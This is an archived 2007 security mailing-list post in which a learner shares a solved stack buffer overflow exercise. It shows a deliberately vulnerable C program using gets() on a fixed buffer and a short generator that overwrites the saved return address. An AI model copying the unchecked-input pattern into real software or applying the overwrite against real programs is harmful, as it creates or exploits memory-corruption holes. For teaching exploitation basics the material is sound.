Re: Re: Controling the eip

From: wymerzp@sbu.edu
Date: Wed May 16 2007 - 00:10:59 EDT

('binary' encoding is not supported, stored as-is) Hello all, thank you for your responses!
I finally figured out the problem. It was rather interesting so I figured that I would share in more detail.
Firstly the "program" to be exploited:
****************************************
#include <stdio.h>
void return_input(void){
        char array[30];
        gets (array);
        printf("%s\n", array);
}
main()
{
   return_input();
   return 0;
}
********************************************
Secondly the new code to produce the ASCII characters of the address to be jumped to:
********************************************
#include <stdio.h>

main()
{
    int i=0;
    char stuffing[40];
    for (i=0; i<=36; i+=4)
    *(long *) &stuffing[i] = 0x84050804;
    puts(stuffing);
}
********************************************
The interesting thing is that the address being placed in stuffing is not the address that I would like to jump to; that is 0x08048405. The reason for this is the buffer size. When I disassembled the function it had a buffer size of 0x24 (in the book it was 0x20) 0x24 in decimal is 36. So, when I was writing to the EIP I was putting the last half of the address onto the EIP 4 bytes (I believe, it's been a while since Computer Organization) and then the second half. this is because of 36 not being cleanly divisble by 8 (i.e. 8 % 36 != 0). I, in my relative 'n00b-ness' found this rather interesting and was elated when I found out the source of my troubles.
Thanks for all who responded!
~Peace,
Zach

------------------------------------------------------------------------
This List Sponsored by: Cenzic

Are you using SPI, Watchfire or WhiteHat?
Consider getting clear vision with Cenzic
See HOW Now with our 20/20 program!

http://www.cenzic.com/c/2020
------------------------------------------------------------------------

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:47 EDT